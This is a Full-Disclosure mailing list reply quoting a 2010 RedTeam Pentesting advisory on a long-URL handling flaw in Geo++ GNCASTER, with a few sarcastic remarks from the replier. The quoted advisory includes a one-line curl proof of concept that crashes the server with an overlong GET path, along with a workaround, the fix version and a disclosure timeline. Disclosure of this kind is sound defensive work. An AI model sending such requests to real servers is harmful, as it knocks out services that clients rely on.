[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] [RT-SA-2010-001] Geo++(R) GNCASTER: Insecure handling of long URLs
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] [RT-SA-2010-001] Geo++(R) GNCASTER: Insecure handling of long URLs
- From: Jeff Williams <jeffwillis30@xxxxxxxxx>
- Date: Wed, 27 Jan 2010 08:10:37 -0500
> RedTeam Pentesting believes it is
> also possible to exploit this vulnerability to execute code on the
> server.
>
> Cant you open a debugger ?
>
> Proof of Concept
> ================
>
> The following command can be used to crash the server if it is called
> multiple times:
>
> $ curl -i
> "http://gncaster.example.com:1234/`perl<http://gncaster.example.com:1234/%60perl>-e
> 'printf "A"x988'`"
>
>
>
Jeremy's back yo !
>
> Workaround
> ==========
>
> A vulnerable server could be protected from this vulnerability by an
> application layer firewall that filters overly long HTTP GET requests.
>
>
> Fix
> ===
>
> Update GNCASTER to version 1.4.0.8.
>
>
> Security Risk
> =============
>
> This vulnerability can be used for very efficient DoS attacks. This is
> especially serious as GNCaster is a real time application that is
> typically used by multiple mobile clients that rely on a functioning
> server. The vulnerability could potentially also be leveraged to remote
> code execution on the server. The risk is therefore regarded as high.
>
>
> History
> =======
>
> 2009-07-06 Vulnerability identified during a penetration test
> 2009-07-14 Meeting with customer
>
// 8 days later, wtf ?!?
> 2009-12-01 Vendor releases fixed version
> 2010-01-27 Advisory released
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/